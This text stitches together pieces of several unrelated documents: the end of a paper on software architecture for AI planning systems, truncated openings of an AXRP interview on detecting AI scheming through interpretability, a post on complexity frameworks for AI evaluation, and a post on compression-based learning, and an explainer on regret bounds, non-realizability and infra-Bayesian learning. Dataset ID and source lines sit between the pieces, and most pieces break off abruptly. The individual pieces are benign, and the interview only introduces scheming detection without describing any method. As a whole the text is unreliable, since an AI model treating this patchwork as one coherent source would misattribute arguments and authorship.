We assess reusability as a composition of the following indicators: portability, flexibility, and understandability Cardino1997. [Figure 11](#S7.F11 "Figure 11 ‣ 7.3 Reusability ‣ 7 Qualitative Assessment ‣ Software Architecture for Next-Generation AI Planning Systems") shows the scores of the reusability indicators. It can be observed that our approach scores better in all indicators than a typical planning artefact. As before, we discuss each indicator next.

Figure 11: Radar Chart of Reusability Indicators
##### Portability
Portability can be determined by having as few dependencies as possible. Our planning architecture uses services that encapsulate their dependencies. Although the services may have many dependencies to external libraries, the dependencies are handled during compile-time. It is also possible to use dependency handlers (e.g., Gradle, Maven) to minimise repository dependency. During runtime, the planning services are entirely decoupled from the communication interface. Therefore, we assign the “+” score to the proposed approach.
Most existing planning artefacts (e.g., PandaPIParser holler2021:panda) depend on operating-system libraries, which may be due to the programming language used (e.g., C++) and the design of the artefact’s architecture. Planning artefacts that offer encapsulated solutions (e.g., virtual images) are rare. Even runnable artefacts are often challenging to find, so one has to handle all build dependencies. As a consequence, we assign “−” for the portability of a typical planning artefact.
##### Flexibility
Flexibility consists of two components, namely generality and modularity. Our approach offers a high degree of generality and modularity. This is mainly due to the encapsulation of planning capabilities, which can also be interpreted as individual modules. Generality is also achieved by using standard communication. Finally, planning capabilities are general enough to be composed in various ways. Therefore, we assign the “+” score.
When examining existing planning artefacts, one can notice that most of them do not use any other modular structures apart from the division into packages. Also, the generality of most of the planning artefacts as software systems is low. However, a set of utility functions is often provided, which can be used independently from the application context. This allows a minimal degree of flexibility, thus, we assign the “O” score.
##### Understandability
Understandability also consists of two components. The first one is documentation. Our approach may have detailed code documentation; however, there is no requirement that enforces such a description. Complexity is the second component. Our system’s total complexity is distributed over several services, which decreases the functional complexity of the individual services. This should be taken with a grain of salt due to the communication overhead that may be incurred in a distributed system. Since the functional complexity outweighs the technical complexity in our context, we assign the “+” score.
For existing planning artefacts, documentation is extremely rare. The behaviour of the artefacts is typically presented in a scientific paper with no guarantee of consistency. Since typical planning artefacts bundle all their functionalities, their behaviour is relatively complicated. The comprehensibility of their individual components is therefore impeded and worse than in a system with separated concerns. As a consequence, we assign the “O” score.
8 Discussion
-------------
The collection of planning capabilities is the result of a qualitative analysis of a set of planning artefacts. This analysis was performed in a rigorous and systematic way in which all steps and information are documented, guaranteeing its validity. While the set of analysed planning artefacts is not exhaustive, it represents a relevant sample of software tools, architectures and frameworks in which AI planning is the intervention. This ensures that the collection of planning capabilities can be generalised to a wider population of planning artefacts. The validity and generalisability allow us to qualify our analysis and its results as trustworthy.
Instead of a decentralised approach to the design of our planning architecture, we could have opted for a centralised approach realised through a central capability service for pure process control. Since the central capability service would always need to be adapted when changing a planning capability or the process itself, a centralised architecture would lack usability. In theory, such a service could be set up generically to be configured via its environment, but this would not be easy to maintain during production. Besides, scalability would be endangered.
Our planning architecture is designed around the concepts of loose coupling and messaging to allow for usability, interoperability and reusability of planning capabilities. This, however, does not entail specifications of standardised interfaces for the capabilities. The reason for this lies in the current state of AI planning and the interests of the AI planning community. In particular, from a standardisation point of view, the community has so far focused only on developing standard modelling languages (PDDL for classical planning and HPDL/HDDL for hierarchical planning). As a consequence, no standards are available for planning capabilities, making it extremely difficult to design standard interfaces for planning capabilities that would support the available planning tools. These findings are reflected in the planning architecture by allowing multiple instances per planning capability. This circumvents the need to operate all planning tools for a single planning capability via one interface. In addition, it is a reasonable approach to create JSON-based interfaces for the modelling languages. Currently, this is only possible for the interfaces of the Parsing capability.
Our planning architecture and prototype are based on messaging, which involves the forwarding of objects and requires their classes to be serialisable. This means that the capabilities of existing planning artefacts need to be decomposable into separate serialisable classes. Existing planning capabilities are tightly coupled software systems, making it extremely difficult, almost impossible, to extract their capabilities as separate classes. This is mainly due to the fact that the AI planning community has neglected software-engineering principles and focused exclusively on the behaviour of the planning tools and algorithms. So, the lack of serialisable classes significantly complicates the integration task. It is therefore necessary to integrate every existing planning implementation into a service using a wrapper with a serialisable data structure. We tried to do this for PDDL4J, JSHOP2 Ilghami2006DocumentationFJ, KPlanning krzisch and PANDA, especially to extract the data structure for the Parsing capability. This also proved problematic: many planners use grounding (listing and instantiating all possible actions from the planning problem specification Ramoul2017) directly linked to the parsing process. In some cases, we even got in touch with the system developers to clarify the problem of data interpretation during parsing. In the end, we successfully integrated only the functionality of the PDDL4J library.
The Modelling service is implemented as a single front-end service. This makes the service complex and tightly coupled. A better approach would be to separate the front-end functionality into more discrete capabilities and decouple it from the functionality used to provide results, login and administration features.
The high scores for usability, interoperability and reusability can be justified by the fact that the planning architecture is the first planning artefact that incorporates software-engineering principles, design patterns and practices. There are also scores lower than the maximum possible. For usability, SOA may cause some disadvantages, especially in planning requests. At the same time, SOA offers many possibilities to improve usability by allowing the implementation of multiple capabilities. For interoperability, our approach does not enforce equal semantic treatment of interacting capabilities. The high interoperability increases the need to have stable or standard interfaces. A correct connection to error management is necessary to be able to create meaningful error messages. For reusability, the currently used JavaDocs might not be sufficient as documentation for such a platform planning architecture. Detailed documentation of each planning capability and the corresponding interfaces might be necessary.
In addition to usability, interoperability and reusability, our approach has the advantage of flexibility. The planning architecture can easily be extended with other planning capabilities, and it can support any data model, provided it is serialisable. So, the proposed approach can be seen as an ecosystem of existing planning capabilities and an incubator of new planning services, having the potential to avoid many development and integration problems and to save time and effort. These advantages would become even more apparent when the system is connected to a real-world application.
9 Conclusions
--------------
We put a software architecture at the core of the ability to build, sustain and foster the use of AI planning systems. We collected a set of planning capabilities that we classified from an operational and technical perspective. These two classifications provide initial support for designers and engineers of AI planning systems by allowing them to quickly understand the objectives, features and properties of the numerous planning capabilities. Upon these capabilities, we designed a service-oriented planning architecture that meets the requirements of usability, interoperability and reusability. The architecture design incorporates appropriate software-engineering principles and design patterns.
The developed system prototype is used to demonstrate the potential for rapid prototyping by leveraging the flexibility of the planning architecture, but also the possibility of integrating existing planning tools when their complex internals allow for it. We showed that our proposed approach has qualitative attributes that go beyond those of typical AI planning artefacts. While our planning architecture represents an initial effort and the prototype offers only limited capabilities, we believe they make a significant step towards bringing software architecture and AI planning closer together. |
0bcde9c8-a73c-4724-9faf-2451beb8cf69 | trentmkelly/LessWrong-43k | LessWrong | AXRP Episode 38.5 - Adrià Garriga-Alonso on Detecting AI Scheming
YouTube link
Suppose we’re worried about AIs engaging in long-term plans that they don’t tell us about. If we were to peek inside their brains, what should we look for to check whether this was happening? In this episode Adrià Garriga-Alonso talks about his work trying to answer this question.
Topics we discuss:
* The Alignment Workshop
* How to detect scheming AIs
* Sokoban-solving networks taking time to think
* Model organisms of long-term planning
* How and why to study planning in networks
Daniel Filan (00:09): Hello, everyone. This is one of a series of short interviews that I’ve been conducting at the Bay Area Alignment Workshop, which is run by FAR.AI. Links to what we’re discussing, as usual, are in the description. A transcript is, as usual, available at axrp.net, and as usual, if you want to support the podcast, you can do so at patreon.com/axrpodcast. Let’s continue to the interview. Adrià, thanks for chatting with me.
Adrià Garriga-Alonso (00:30): Thank you for having me, Daniel.
Daniel Filan (00:31): For people who aren’t familiar with you, can you say a little bit about yourself, what you do?
Adrià Garriga-Alonso (00:35): Yeah. My name is Adrià. I work at FAR.AI. I have been doing machine learning research focused on safety for the last three years and before that, I did a PhD in machine learning. I’ve been thinking about this for a while, and my current work is on mechanistic interpretability and specifically how we can use interpretability to detect what a neural network wants and what it might be scheming towards.
The Alignment Workshop
Daniel Filan (01:04): Before I get into that too much, we’re currently at this alignment workshop being run by FAR.AI. How are you finding the workshop?
Adrià Garriga-Alonso (01:10): It’s really great. I have had lots of stimulating conversations and actually, I think my research will change at least a little bit based on this. I’m way less sure of what I am doing now. I still think it makes sense, bu |
90f76f09-6b53-45b7-92b7-9a1a2baced3b | trentmkelly/LessWrong-43k | LessWrong | Embracing complexity when developing and evaluating AI responsibly
Complex Intervention Development and Evaluation Framework: A Blueprint for Ethical and Responsible AI Development and Evaluation
The rapid evolution of artificial intelligence (AI) presents significant opportunities, but it also raises serious concerns about its societal impact. Ensuring that AI systems are fair, responsible, and safe is more critical than ever, as these technologies become embedded in various aspects of our lives. In this post, I’ll explore how a framework used for developing and evaluating complex interventions (1:2) — common in public health and social sciences—can offer a structured approach for navigating the ethical challenges of AI development.
I used to believe that by applying first principles and establishing a clear set of rules, particularly in well-defined environments like games, we could guarantee AI safety. However, when I encountered large language models (LLMs) that interact with vast bodies of human knowledge, I realised how limited this view was. These models function in the "wild" world characterised by dynamic rules, fluid social contexts, and hard to predict human behaviour and interactions. This complexity calls for approaches that embrace uncertainty and acknowledge the messiness of real-world environments. This realisation led me to draw from methods used in social science and public health, particularly those related to complex interventions designed to influence behaviour and create change (1;2).
Some AI systems, such as Gemini, ChatGPT, Llama, much like complex interventions, are developed to interact with humans as agents and potentially influence human behaviour in dynamic, real-world contexts. First principles alone are insufficient to ensure fairness and safety in these systems. Foreseeing and eliminating bias in such a complex setting poses a challenge. It is inefficient to pinpoint biases in a complex system in a top down manner. Instead, we need rigorous, evidence-based approaches that place stakeholder |
633b2189-cfad-4ec4-9e0e-f28114613ef1 | trentmkelly/LessWrong-43k | LessWrong | My (Mis)Adventures With Algorithmic Machine Learning
Introduction
This was originally posted here.
I've been researching, for quite some time, the prospect of machine learning on a wider variety of data types than normally considered; things other than tables of numbers and categories. In particular, I want to do ML for program and proof synthesis which requires, at the very least, learning the structures of trees or graphs which don't come from a differentiable domain. Normal ML algorithms can't handle these; though some recent methods, such as graph neural networks and transformers, can be adapted to this domain with some promising results. However, these methods still rely on differentiation. Is this really required? Are we forever doomed to map all our data onto a differentiable domain if we want to learn with it?
An alternative approach that has been bandied about for a while is the utilization of compression. It's not hard to find articles and talks about the relationship between compression and prediction. If you have a good predictor, then you can compress a sequence into a seed for that predictor and decompress by running said predictor. Going the other way is harder, but, broadly speaking, if you have a sequence that you want to make a prediction on and a good compressor, then whichever addition increases the compressed size the least should be considered the likeliest prediction. This approach is quite broad, applying to any information which can be represented on a computer and not requiring any assumptions whatsoever about the structure of our data beyond that. We could use this idea to, for example, fill in gaps in graphs, trees, sets of input-output pairs, etc.
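To make this concrete, here's a minimal sketch of compression-based prediction in Kotlin, using zlib (via `java.util.zip` on the JVM) as a stand-in for a good compressor. A true Kolmogorov-optimal compressor is uncomputable, so any real compressor only approximates this idea, and on strings this short the compressor's overhead matters:

```kotlin
import java.util.zip.Deflater

// Size of the zlib-compressed form of `data`, as a crude proxy for K(data).
fun compressedSize(data: ByteArray): Int {
    val deflater = Deflater(Deflater.BEST_COMPRESSION)
    deflater.setInput(data)
    deflater.finish()
    val buffer = ByteArray(data.size + 64)
    var total = 0
    while (!deflater.finished()) total += deflater.deflate(buffer)
    deflater.end()
    return total
}

// The candidate that increases the compressed size the least is treated
// as the likeliest continuation of the history.
fun bestContinuation(history: String, candidates: List<String>): String {
    val base = compressedSize(history.toByteArray())
    return candidates.minByOrNull { c ->
        compressedSize((history + c).toByteArray()) - base
    }!!
}

fun main() {
    val history = "ababababababababab"
    println(bestContinuation(history, listOf("a", "b", "c"))) // likely "a"
}
```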
It's important to understand what's actually required here. We don't actually need to compress our training data; we only need a way to estimate the change in minimal-compression-size as we add a prediction. This minimal-compression-size is called the Kolmogorov Complexity, denoted K(X). The minimal-compression-size of a program which outputs |
2768844f-f488-4a2a-a851-f0c1de9bf3db | StampyAI/alignment-research-dataset/lesswrong | LessWrong | Performance guarantees in classical learning theory and infra-Bayesianism
Introduction
============
I wrote this post during my [SERI MATS](https://www.serimats.org/) scholarship, explaining the part of [infra-Bayesianism](https://www.lesswrong.com/posts/zB4f7QqKhBHa5b37a/introduction-to-the-infra-bayesianism-sequence) that I understood the most deeply. Compared to some [previous distillations](https://www.alignmentforum.org/posts/Zi7nmuSmBFbQWgFBa/infra-bayesianism-unwrapped), I don't go deeply into the mathematical machinery built around infra-Bayesianism, instead I try to evaluate what results infra-Bayesianism produced compared to classical learning theory in the topic of performance guarantees in general environments, which was the main motivation behind the development of infra-Bayesianism.
The theorems appearing in the post are not original to me, and can be found in either the broader academic literature (concerning classical learning theory) or Vanessa's writings (concerning infra-Bayesianism). I included proofs in the text when I found them useful for general understanding, and moved them to the Appendix when I thought them simple and important enough to write down, but not interesting enough to break the flow of text with them. The later examples investigating the limits of infra-Bayesian learning are my own.
My conclusion is that the general performance guarantees we can currently prove about infra-Bayesian learning agents are pretty weak, but it seems plausible that the theory gets us closer to tackling the question.
For my general thoughts and doubts about infra-Bayesianism, see my other, less technical post: [A mostly critical review of infra-Bayesianism](https://www.lesswrong.com/posts/StkjjQyKwg7hZjcGB/a-mostly-critical-review-of-infra-bayesianism).
Classical reinforcement learning
================================
Before we go into the infra-Bayesian explainer, or before we could even really state what the motivating problem of non-realizability is, it's important to get at least a superficial overview of classical reinforcement learning theory that is studied in academia since a long time. My main source for this was the book [Bandit Algorithms](https://tor-lattimore.com/downloads/book/book.pdf) by Lattimore and Szepesvári.
In a simple model of reinforcement learning, the agent is placed in an environment, and on every turn, the agent chooses an action from its finite action set A, and after that, the environment gives an observation from the finite observation set O. There is a bounded loss function ℓ that is known to the agent in advance, assigning real-valued losses to finite histories. Usually, we will work with loss functions ℓ:A×O→R. This choice is motivated by game theory, where the learning process would be a repeated game, and in each turn, the loss is determined by the agent's action and the opponent's action (the observation).
This definition of loss function is already pretty general, because for any loss function that can only take finitely many values, we can encode the loss in the observation itself, which gives the loss function the desired ℓ:A×O→R form. It's important that we required the loss function to be bounded, otherwise we could encounter inconvenient [St. Petersburg paradox](https://en.wikipedia.org/wiki/St._Petersburg_paradox)-style scenarios.
The agent has to take repeated actions either until a time horizon T or indefinitely. If the agent's lifespan is infinite, there needs to be a way to compare overall results instead of just saying "there is infinite loss accumulated anyway", so we introduce a time discount rate γ∈(0,1). We will concentrate on this infinite, time-discounted version.
**Notation** (ΔX). *For a space X, the notation ΔX refers to the space of probability distributions over X.*
An environment is a function e:(A×O)∗×A→ΔO that assigns a probability distribution over observations to every finite history ending with the agent taking an action.
The agent has a policy π:(A×O)∗→ΔA that assigns a probability distribution over actions to every finite history ending with an observation.
A policy is good if it ensures that the agent is successful in a range of environments.
Formally, the agent has a hypothesis class H made of environments (H is usually defined to be finite or countably infinite). It wants to use a policy π such that for every environment e∈H, the policy π has low regret with respect to environment e.
**Definition 1** (Expected regret).

*The expected regret of policy π in environment e with respect to loss function Lγ is defined as the expected loss under policy π minus the minimum expected loss over all policies π∗ in environment e with respect to loss function Lγ:*

$$\mathrm{ER}(\pi, e, L_\gamma) = \mathbb{E}_{\pi,e}(L_\gamma) - \min_{\pi^*} \mathbb{E}_{\pi^*,e}(L_\gamma).$$

Here Lγ denotes the overall loss with discount rate γ:
**Definition 2** (Lγ).

$$L_\gamma = (1-\gamma)\sum_{t=0}^{\infty} \gamma^t \,\ell(t),$$

*where ℓ(t) is the agent's loss in turn t.*
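As a quick sanity check on the normalisation factor (1−γ): if the loss is a constant ℓ(t)=c in every turn, the geometric series gives

$$L_\gamma = (1-\gamma)\sum_{t=0}^{\infty} \gamma^t c = (1-\gamma)\cdot\frac{c}{1-\gamma} = c,$$

so Lγ is a weighted average of the per-turn losses and stays within the same bounds as ℓ.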
Intuitively, an agent with a good policy takes some time to explore the environment, then as the agent becomes reasonably certain which environment it is in, it starts exploiting the environment, although potentially still taking exploratory steps occasionally.
As the discount rate γ goes to 1, the agent has more and more time to freely explore its environment, because 1000 rounds of exploration is still not too costly compared to the overall utility, so hopefully it will be true that whichever environment e∈H the agent is placed in, it will have time to decide which environment it is in, with a very low probability of mistake, then start to play an almost-optimal strategy for that environment, thus ensuring that the regret is low. If this holds, we call the hypothesis class H learnable. Formally,
**Definition 3** (Learnability).

*A hypothesis class H is said to be learnable if there exists a family of policies {πγ} such that for every environment e∈H,*

$$\lim_{\gamma \to 1} \mathrm{ER}(\pi_\gamma, e, L_\gamma) = 0.$$

It's important to note that not every hypothesis class is learnable. For example, take a hypothesis class that contains these two environments: in environment E, if the agent makes move X in the first turn, it goes to Heaven (receives minimal loss in every turn from then on), otherwise it goes to Hell (receives maximal loss in every turn from then on). Environment F is just the reverse. Then it's impossible to construct a policy that has low regret with respect to both environments E and F.
This is a classical example of a trap: an action that has irrevocable consequences. Generally speaking, neither classical nor infra-Bayesian learning theory has a good model of what agents are supposed to do in an environment that might contain traps. This is a big open question that seriously limits our mathematical formalism of real-world agency (as the real world is full of traps, most notably death). But this is an independent concern that infra-Bayesianism doesn't try to address, so we are only looking at learnable hypothesis classes now.
Fortunately, some natural hypothesis classes turn out to be learnable, as we will discuss later. The heuristic is that if no mistake committed in a short period of time is too costly, according to any environment in the class, then the class will be learnable.
Before we look at examples, it's useful to establish the following simple theorem:
**Theorem 4**.

*If every finite subset of the countable hypothesis class H is learnable, then H itself is learnable.*
Now we can look at examples of learnable hypothesis classes:
**Definition 5** (Bandit environment).

*A bandit is an environment in which, in every turn, the probability distribution of the observation only depends on the action in that turn. A bandit environment can be characterized by a function B:A→ΔO.*
The "bandit" name comes from the illustration that the agent is placed in a casino with various slot machines, aka "one-armed bandits" and the action is choosing the slot machine, and each machine has a probability distribution according to which the agent gets an observation (the amount of money falling out of the machine).
**Theorem 7**. *A class H of bandit environments is always learnable.*
*Proof.* We will only prove the statement for countable classes H, but it's not hard to extend the proof further. By Theorem 4, it's enough to prove it for finite classes to obtain a proof for every countable class.
For a finite hypothesis class H, it's enough to just always play the action that produced the lowest loss on average in the past, and occasionally do exploratory moves and try the other actions too, but with a frequency decreasing towards 0.
As γ→1 and the agent lives longer in expectation, the action producing the smallest loss in expectation will become the one with the smallest average loss, due to the law of large numbers. Then, the agent will mostly play that optimal action, so its average regret goes to 0. ◻
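As a concrete illustration of the policy used in the proof, here is a minimal Python sketch (the environment interface and the 1/√t exploration schedule are illustrative choices of mine, not taken from the text):

```python
import random

def bandit_learner(actions, sample_loss, horizon):
    """Play the action with the lowest average loss so far, but take a
    uniformly random exploratory action with probability (t + 1) ** -0.5,
    which decreases toward 0 but never vanishes.

    `sample_loss(a)` draws one loss for action `a` from the unknown bandit.
    """
    totals = {a: 0.0 for a in actions}
    counts = {a: 0 for a in actions}
    overall = 0.0
    for t in range(horizon):
        unexplored = [a for a in actions if counts[a] == 0]
        if unexplored:
            a = unexplored[0]                       # try everything once
        elif random.random() < (t + 1) ** -0.5:
            a = random.choice(actions)              # exploratory step
        else:
            a = min(actions, key=lambda x: totals[x] / counts[x])
        loss = sample_loss(a)
        totals[a] += loss
        counts[a] += 1
        overall += loss
    return overall / horizon

# Toy bandit: X has expected loss 0.1, Y has expected loss 0.9.
avg = bandit_learner(["X", "Y"],
                     lambda a: random.random() * (0.2 if a == "X" else 1.8),
                     horizon=100_000)
print(avg)  # close to 0.1: per-turn regret is small over long horizons
```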
We could be interested not just in learnability, but in what regret bounds are achievable given a time discount rate γ or time horizon T. For this, we would need to find the optimal rate to decrease the frequency of exploratory steps. There is a nice answer to this question in the literature, but we don't go into details here, as the exact regret bounds are not crucial for the main topic of this post.
A broader hypothesis class we will use is finite-state communicating [POMDP](https://en.wikipedia.org/wiki/Partially_observable_Markov_decision_process)s.
(We could also look at [Markov Decision Processes (MDPs)](https://en.wikipedia.org/wiki/Markov_decision_process) as an intermediate step, but we are ignoring them for this post.)
**Definition 8** (POMDP).
*A Partially Observed Markov Decision Process consists of a set of hidden states S, a stochastic transition function f:S×A→ΔS (where A is the set of the agent's possible actions), and an observation function F:S→O.*
**Definition 9** (Finite-state communicating POMDP).
*A POMDP in which S is finite and has the property that for every s1,s2∈S, an agent can have a policy π such that starting from state s1 and following policy π, it eventually gets to state s2 with probability 1.*
**Theorem 10**. *A hypothesis class made of finite-state communicating POMDPs is always learnable.*[[1]](#fntvwwxz1dies)
There are some learnable hypothesis classes even broader than this, but these are enough for our purpose now, as many systems can be modelled as finite-state communicating POMDPs: the world can be in one of a number of states, you can't see everything in the world but have some limited observations and corresponding rewards, and you can make some reversible changes in the world.
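A minimal sketch of the Definition 8 objects in Python, with hand-made toy dynamics (the two-state example is mine, not from any cited source); note that each state is reachable from the other, so this toy POMDP is also communicating in the sense of Definition 9:

```python
import random

# S = {"left", "right"}, A = {"stay", "move"}, O = {0, 1}
TRANSITION = {  # f : S x A -> Delta(S), each entry a {next_state: probability}
    ("left", "stay"):  {"left": 0.9, "right": 0.1},
    ("left", "move"):  {"left": 0.1, "right": 0.9},
    ("right", "stay"): {"right": 0.9, "left": 0.1},
    ("right", "move"): {"right": 0.1, "left": 0.9},
}
OBSERVE = {"left": 0, "right": 1}  # F : S -> O

def step(state, action):
    """Sample the next hidden state and return (next_state, observation)."""
    dist = TRANSITION[(state, action)]
    next_state = random.choices(list(dist), weights=list(dist.values()))[0]
    return next_state, OBSERVE[next_state]

s = "left"
for a in ["move", "stay", "move"]:
    s, o = step(s, a)
    print(a, "->", o)  # the agent only ever sees these observations
```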
Bayes-optimal policies
----------------------
Instead of ensuring that the regret is low with respect to every individual hypothesis in the class, the agent can aim for the weighted average of regrets being low.
**Definition 11** (Bayesian regret). *Given a prior distribution ζ on the hypothesis class H, the Bayesian regret of a policy π is*
Ee∼ζ ER(π,e,L).
**Theorem 12**.
*Given a countable hypothesis class H and a non-dogmatic prior ζ on H (non-dogmatic meaning that ζ(h)>0 for all h∈H), and a family of policies πγ, then*
limγ→1 Ee∼ζ ER(πγ,e,Lγ) = 0
*is equivalent to*
limγ→1 ER(πγ,e,Lγ) = 0 ∀e∈H,
*that is, the class H being learnable and π being a good learning algorithm.*
This result might suggest that Bayesian regret doesn't give us much value over considering regret with respect to individual hypotheses, but we will see that it has important applications.
Most importantly, now that (given a prior distribution) we can assign a single quantity to the policy's performance, we can look at the policy that minimizes the Bayesian regret:
**Definition 13** (Bayes-optimal policy).
*Given a prior distribution ζ over the hypothesis class H, the policy π is said to be Bayes-optimal if it minimizes the Bayesian regret. This is equivalent to the policy minimizing*
Ee∼ζ Eπ,e(L).
Using the previous result, we can prove the following, rather unsurprising statement:
**Theorem 14**.
*Given a learnable, countable hypothesis class H and a non-dogmatic prior ζ on H, if we take the Bayes-optimal policy πγ for every γ∈(0,1), then this family of policies learns the hypothesis class H.*
As we will see later, it's often easier to prove nice properties about Bayes-optimal policies than just policies with low regret bound in general.
However, while there are some famous algorithms in the literature that ensure low regret bounds (like UCB, UCRL, Exp3), it's usually computationally intractable to find the Bayes-optimal policy. In general, it's more reasonable to expect that a real-life algorithm will achieve some low regret bounds than that it will be literally the best, Bayes-optimal policy.
Thus, both in the academic literature and in our work, we usually want to prove more general theorems in the form "Every policy that has low regret bounds with respect to this hypothesis class, has that property" instead of the much narrower claim of "The Bayes-optimal policy has that property". Still, when we can't prove something stronger, we sometimes fall back to investigating the Bayes-optimal policy.
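Although *finding* the Bayes-optimal policy is usually intractable, *estimating* the Bayesian regret of a given policy by Monte Carlo is cheap. A toy Python sketch for a finite prior over bandit environments (the environments, prior, and the history-independent policy below are made-up stand-ins, not anything from the literature):

```python
import random

def mc_bayesian_regret(prior, policy, gamma, rollouts=100, horizon=2_000):
    """Estimate E_{e ~ zeta} ER(pi, e, L_gamma) for a history-independent
    policy over bandit environments given as {action: mean_loss} dicts.

    For a bandit, the optimal discounted loss is just the smallest mean loss,
    since (1 - gamma) * sum_t gamma^t * c = c for a constant per-turn loss c.
    """
    total = 0.0
    for env, weight in prior:
        best = min(env.values())
        for _ in range(rollouts):
            loss = sum((1 - gamma) * gamma ** t
                       * random.random() * 2 * env[policy(t)]  # mean env[a]
                       for t in range(horizon))
            total += weight * (loss - best) / rollouts
    return total

prior = [({"X": 0.1, "Y": 0.9}, 0.5), ({"X": 0.8, "Y": 0.2}, 0.5)]
print(mc_bayesian_regret(prior, policy=lambda t: "X", gamma=0.99))  # ~0.3
```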
Non-realizability and classical learning theory
===============================================
The big problem of classical learning theory is that we have no guarantees that a policy selected for having low regret with respect to the environments in its hypothesis class, will also behave reasonably when placed in an environment that is not contained in its hypothesis class. (An environment not in the hypothesis class is called [non-realizable](https://www.lesswrong.com/posts/i3BTagvt3HbPMx6PN/embedded-agency-full-text-version#3_1__Realizability).)
Unfortunately, however broad a hypothesis class the agent has, we can't expect it to have a model of itself or of an equally complex agent encoded in any of its hypotheses about the world. This is true both for practical reasons (it can't contain in its head a model of the world bigger than itself) and for theoretical reasons (if the agent could have a model including itself, it could adopt the policy of doing the opposite of what its model predicts, which would lead to an obvious paradox). Also, even excluding these situations, the world is just very big, and it's unrealistic to assume that an AI could have the "true state of the world" fully modeled as one of its hypotheses. So it would be nice if we had some guarantees about the agent's performance in environments that are not directly encoded as one of its hypotheses.
A naive hope would be that maybe it's not a big problem, and if an algorithm learns a broad enough hypothesis class, then it necessarily generalizes to do reasonably well even outside the class. Let's look at some concrete examples showing that this is not the case.
The 010101... failure mode
--------------------------
The agent's loss function is this: any time it plays action X, it gets 0 loss; any time it plays action Y, it gets 1 loss, regardless of the observations. The environment is oblivious, so the observations don't depend on the agent's actions. Obviously, the right choice would be to always play X.
Suppose the agent's hypothesis class consists only of bandits. Then, surprisingly, this learning algorithm will guarantee extremely low expected regret with respect to every environment in the hypothesis class:
"Start with action Y, and and play action Y as long as the observation history looks like 010101... After the first deviation from this sequence, take action X ever after."
As the pattern 010101... is very unlikely to continue for long under any bandit environment, this policy has very low expected regret. In particular, the bandit with respect to which this policy has the highest expected regret (as γ goes to 1) is the one in which, after an action Y, the observations 0 and 1 both have probability 1/2. In that environment, the expected regret is
(1−γ) ∑_{k=0}^∞ γ^k (1/2)^k = (1−γ)/(1−γ/2), which goes to 0 as γ goes to 1.
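A quick numeric sanity check of this sum (a sketch; the truncation at 10,000 terms is more than enough for these values of γ):

```python
for gamma in (0.9, 0.99, 0.999):
    truncated = (1 - gamma) * sum((gamma * 0.5) ** k for k in range(10_000))
    closed_form = (1 - gamma) / (1 - gamma / 2)
    print(gamma, truncated, closed_form)  # both shrink toward 0 as gamma -> 1
```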
It's good to note that the failure mode doesn't need to be just one specific history, it can leave some wiggle room, like the following policy:
"Always play X except if in the history so far the difference between the number of 1s and 0s is at most √n (where n is the length of your history so far) and there were at most √n instances when two observations coming after each other were equal. In that case, play Y."
The probability of observing a long sequence like that is still vanishingly unlikely in any bandit environment, so the policy is allowed to have this broader failure mode too. This means that if the agent is placed in an environment that mostly produces a 01010... sequence, then postulating a little random noise in the environment doesn't save the agent from predictable failure.
I somewhat feel that this is a contrived counter-example: why would an agent have this specific failure mode? I will need to look into [Selection theorems](https://www.lesswrong.com/posts/G2Lne2Fi7Qra5Lbuf/selection-theorems-a-program-for-understanding-agents) in the future; according to my understanding, that agenda is about figuring out which algorithms are likely to be selected during real-life training, and formalizing the intuition of "Come on, why would we get an algorithm that has this specific failure mode?" But that is not our agenda; we are looking for provable guarantees, and this example already refutes the naive hope that low regret inside the hypothesis class would always lead to good performance outside the class.
The square-free failure mode
----------------------------
Sure, the 010101... environment can fool an agent that only prepares for bandit environments in its hypothesis class. But maybe if the hypothesis class is broad enough, then a policy that learns the class is really guaranteed to behave reasonably outside the class too! In particular, there is a simple finite-state communicating POMDP that produces the 010101... sequence of observations, so if the agent's hypothesis class is the set of finite-state communicating POMDPs, then a policy that learns it does well in the 010101... environment.
Unfortunately, just broadening the hypothesis class a little doesn't solve the problem: the policy can always have a failure mode, a specific sequence of observations that is very unlikely to happen according to any of the hypotheses in the class, but might easily be encountered in the wild. In the case of a hypothesis class made of finite-state communicating POMDPs, all hypotheses suggest that there is a vanishingly low probability of observing the sequence which is 1 for [square-free](https://en.wikipedia.org/wiki/Square-free_integer) indices and 0 otherwise, so the policy having a failure mode for that sequence doesn't cause much expected regret.
It's important to emphasize that the general problem is not "Well, maybe the agent will encounter a specific random string of observations in the wild and it happens to exactly match its failure mode." No, if the failure mode string was truly random and unexceptional, then there wouldn't be a significant risk of the true environment producing it either. The real problem is that the failure mode can also be a highly non-random string that could in principle be very predictable from the real environment (like the square-free numbers can be a naturally occurring sequence), but as the agent doesn't have the true environment in its hypothesis class, it can easily happen that a string which is very natural in the true environment is considered very unlikely according to all the agent's hypotheses, and therefore the agent is allowed to have it as a failure mode.
Bayes-optimal policies
----------------------
Let's be less ambitious then: If a policy doesn't just have low regret on a hypothesis class, but it's the single best policy given a prior (it's Bayes-optimal), then is it enough to guarantee good performance outside the class?
Sometimes, sort of! Let's assume for now that we only care about oblivious environments, that is, we can assume that the agent's observations are not influenced at all by its actions. Let's also assume that the agent knows this: its hypothesis class includes only oblivious environments. Further, suppose that there is at least one environment with non-zero prior in the hypothesis class according to which every finite sequence of observations has at least a tiny chance of happening. (For example, the environment in which observations are independently random with uniform distribution over O.) In that case, a Bayes-optimal policy never performs dominated actions: that is, if there are actions a and b with ℓ(a,o)<ℓ(b,o) for all possible observations o, then the agent never takes the action b that is always worse. This is easy to prove: since changing an action from b to a in any situation only decreases the expected loss, the Bayes-optimal policy can never play b.
This is not a very impressive result in itself, especially since even if the agent is actually placed in an oblivious environment, if its hypothesis class contains non-oblivious environments too, then it's suddenly not clear whether the agent will learn not to play dominated actions.
Bayes-optimal policy being deceived by Morse-codes
--------------------------------------------------
The agent's loss function is this: any time it plays action X, it gets 0 loss; any time it plays action Y, it gets 1 loss; and in addition to that, any time the observation is 1, it gets 10 loss, and any time the observation is 0, it gets 0 loss. The environment is oblivious, so the observations don't depend on the agent's actions. Obviously, the right choice would be to always play X.
However, the agent doesn't know for certain that the environment is oblivious, it has some prior probability on hypotheses according to which action Y makes observation 0 more likely, in which case it could be better to play Y.
So the agent does some experimentation, but doesn't find any statistical correspondence between its actions and the observations (as the environment really is oblivious). But before it could pivot to just playing action X, it realizes that the observations so far are repetitions of this Morse-code: "Your actions didn't matter so far. But if you play action Y until the 1000th turn, then you will be rewarded with 1000 turns of observation 0!"
